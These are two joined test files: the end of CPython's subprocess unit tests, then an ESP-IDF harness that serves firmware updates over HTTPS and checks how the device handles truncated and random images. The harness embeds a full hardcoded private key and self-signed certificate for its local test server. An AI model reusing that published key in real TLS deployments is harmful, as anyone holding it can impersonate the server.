for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
executable_list = "exec" # error: must be a sequence
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, [], cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class CommandTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = set(("list2cmdline",))
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(FileNotFoundError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
CommandTests,
ProcessTestCaseNoPoll,
CommandsWithSpaces,
ContextManagerTests,
)
support.run_unittest(*unit_tests)
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
example_test.py
|
import http.server
import os
import random
import re
import socket
import ssl
import struct
import subprocess
from threading import Thread
import ttfw_idf
from tiny_test_fw import DUT
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n'\
'BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n'\
'aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n'\
'MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n'\
'ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n'\
'CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n'\
'nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n'\
'9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n'\
'w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n'\
'3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n'\
'lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n'\
'IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n'\
'DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n'\
'/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n'\
'lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n'\
'6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n'\
'fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n'\
'y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n'\
'hA==\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n'\
'uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n'\
'iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n'\
'ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n'\
'BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n'\
'1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n'\
'Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n'\
'02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n'\
'4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n'\
'SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n'\
'cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n'\
'8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n'\
'MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n'\
'6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n'\
'CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n'\
'ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n'\
'0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n'\
'5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n'\
'zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n'\
'V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n'\
'RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n'\
'nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n'\
'GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n'\
'9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n'\
'qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n'\
'muhfskWf4MABV0yTUaKcGg==\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, 'w+') as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, 'server_cert.pem')
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, 'server_key.pem')
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# No. of times working of application to be validated
iterations = 3
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: Image validation failed, image is corrupted', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: received package is not fit len', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Random binary file to be generated
random_bin_name = 'random.bin'
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
